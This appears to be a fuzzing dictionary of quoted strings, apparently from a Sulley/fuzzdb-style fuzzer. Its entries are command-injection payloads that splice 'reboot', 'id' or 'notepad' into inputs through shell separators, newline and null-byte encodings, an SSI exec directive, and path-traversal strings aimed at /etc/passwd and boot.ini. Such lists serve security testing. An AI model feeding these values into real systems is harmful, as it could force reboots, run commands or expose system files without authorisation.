"!@#$%%^#$%#$@#$%$$@#$%^^**(()"
"$(reboot)"
"$;reboot"
"%00"
"%00/"
"%01%02%03%04%0a%0d%0aADSF"
"%01%02%03@%04%0a%0d%0aADSF"
"%0a reboot %0a"
"%0Areboot"
"%0Areboot%0A"
"%0DCMD=$'reboot';$CMD"
'%0DCMD=$"reboot";$CMD'
"%0Dreboot"
"%0Dreboot%0D"
"%\xfe\xf0%\x00\xff"
"%u0000"
"& reboot &"
"& reboot"
"&&CMD=$'reboot';$CMD"
'&&CMD=$"reboot";$CMD'
"&&reboot"
"&&reboot&&"
"&CMD=$'reboot';$CMD"
'&CMD=$"reboot";$CMD'
"&reboot"
"&reboot&"
"'reboot'"
"..:..:..:..:..:..:..:..:..:..:..:..:..:"
"/%00/"
"/.../.../.../.../.../.../.../.../.../.../"
"/../../../../../../../../../../../../boot.ini"
"/../../../../../../../../../../../../etc/passwd"
"/index.html|reboot|"
"; reboot"
";CMD=$'reboot';$CMD"
';CMD=$"reboot";$CMD'
";id"
";notepad;"
";reboot"
";reboot/n"
";reboot;"
";reboot|"
";system('reboot')"
";touch /tmp/SULLEY;"
";|reboot|"
'<!--#exec cmd="reboot"-->'
"<reboot"
"<reboot%0A"
"<reboot%0D"
"<reboot;"
"\\\\*"
"\\\\?\\"
"\nnotepad\n"
"\nreboot\n"
"\x01\x02\x03\x04"
"^CMD=$'reboot';$CMD"
'^CMD=$"reboot";$CMD'
"^reboot"
"`reboot`"
"a);reboot"
"a);reboot;"
"a);reboot|"
"a)|reboot"
"a)|reboot;"  # fuzzdb command injection
"a;reboot"
"a;reboot;"
"a;reboot|"
"a|reboot"
"CMD=$'reboot';$CMD"
'CMD=$"reboot";$CMD'
"FAIL||CMD=$'reboot';$CMD"
'FAIL||CMD=$"reboot";$CMD'
"FAIL||reboot"
"id"
"id;"
"id|"
"reboot"
"reboot;"
"reboot|"
"| reboot"
"|CMD=$'reboot';$CMD"
'|CMD=$"reboot";$CMD'
"|nid"
"|notepad"
"|reboot"
"|reboot;"
"|reboot|"
"|touch /tmp/SULLEY"  # command injection.
"||reboot;"
"||reboot|"